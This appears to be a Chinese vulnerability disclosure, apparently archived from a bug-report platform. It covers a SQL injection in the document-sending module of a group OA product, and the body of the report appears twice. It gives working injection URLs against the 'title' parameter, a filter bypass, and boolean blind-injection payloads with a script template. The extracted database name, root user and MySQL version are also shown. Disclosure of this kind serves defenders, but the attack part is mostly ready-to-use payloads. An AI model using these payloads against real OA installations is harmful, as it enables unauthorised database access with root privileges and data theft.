### 简要描述: 集团OA最新版,未过滤',然后再绕过过滤函数,root权限 ### 详细说明: 厂商官网:http://**.**.**.**/ 集团demo地址:**.**.**.**/ SQL漏洞地址: ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1 参数title可注入 ``` 这个点竟然没有过滤单引号' [<img src="https://images.seebug.org/upload/201510/19183301f5727cc2440b462979be90d3f57056d2.png" alt="1019-20.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/19183301f5727cc2440b462979be90d3f57056d2.png) 爆SQL语句: 提交: ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and 1=2 union select ``` [<img src="https://images.seebug.org/upload/201510/19183439bd3193c3663c2c818b37301dceff7a90.png" alt="1019-21.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/19183439bd3193c3663c2c818b37301dceff7a90.png) 返回: ``` 不安全的SQL语句:联合查询 select count(*) as total from doc_send_data as a where 1 = 1 and title like '%1%' and 1=2 union select%' and status='6' and...
### 简要描述: 集团OA最新版,未过滤',然后再绕过过滤函数,root权限 ### 详细说明: 厂商官网:http://**.**.**.**/ 集团demo地址:**.**.**.**/ SQL漏洞地址: ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1 参数title可注入 ``` 这个点竟然没有过滤单引号' [<img src="https://images.seebug.org/upload/201510/19183301f5727cc2440b462979be90d3f57056d2.png" alt="1019-20.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/19183301f5727cc2440b462979be90d3f57056d2.png) 爆SQL语句: 提交: ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and 1=2 union select ``` [<img src="https://images.seebug.org/upload/201510/19183439bd3193c3663c2c818b37301dceff7a90.png" alt="1019-21.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/19183439bd3193c3663c2c818b37301dceff7a90.png) 返回: ``` 不安全的SQL语句:联合查询 select count(*) as total from doc_send_data as a where 1 = 1 and title like '%1%' and 1=2 union select%' and status='6' and a.creator='admin' ``` 然后绕过过滤,构造注入 ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(version())=41 and 'a%'='a ``` [<img src="https://images.seebug.org/upload/201510/19183649c375a7ed001b5496615dc50dc5e49ea7.png" alt="1019-22.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/19183649c375a7ed001b5496615dc50dc5e49ea7.png) 判断version长度为41 同理判断user、database ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(database())=5 and 'a%'='a ``` ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(user())=14 and 'a%'='a ``` 构造盲注点: ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and CONV(HEX(SUBSTRING(database(),1,1)),16,10)=116 and 'a%'='a ``` 直接用脚本跑: ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and CONV(HEX(SUBSTRING(database(),{1},1)),16,10)={1} and 'a%'='a ``` [<img src="https://images.seebug.org/upload/201510/191837437a4cd43b4126a0bbbb71f4825436ca90.png" alt="1015-database.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/191837437a4cd43b4126a0bbbb71f4825436ca90.png) database ``` td_oa ``` [<img src="https://images.seebug.org/upload/201510/191837517ee20a1cbd85ffde73d6e8b3f92288b1.png" alt="1015-user.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/191837517ee20a1cbd85ffde73d6e8b3f92288b1.png) user ``` root@**.**.**.** ``` [<img src="https://images.seebug.org/upload/201510/191837553275b5c88c22cdc1aa467d9e6ec97f2a.png" alt="1015-version.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/191837553275b5c88c22cdc1aa467d9e6ec97f2a.png) version ``` 5.5.36-enterprise-commercial-advanced-log ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201510/191837437a4cd43b4126a0bbbb71f4825436ca90.png" alt="1015-database.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/191837437a4cd43b4126a0bbbb71f4825436ca90.png) database ``` td_oa ``` [<img src="https://images.seebug.org/upload/201510/191837517ee20a1cbd85ffde73d6e8b3f92288b1.png" alt="1015-user.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/191837517ee20a1cbd85ffde73d6e8b3f92288b1.png) user ``` root@**.**.**.** ``` [<img src="https://images.seebug.org/upload/201510/191837553275b5c88c22cdc1aa467d9e6ec97f2a.png" alt="1015-version.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/191837553275b5c88c22cdc1aa467d9e6ec97f2a.png) version ``` 5.5.36-enterprise-commercial-advanced-log ```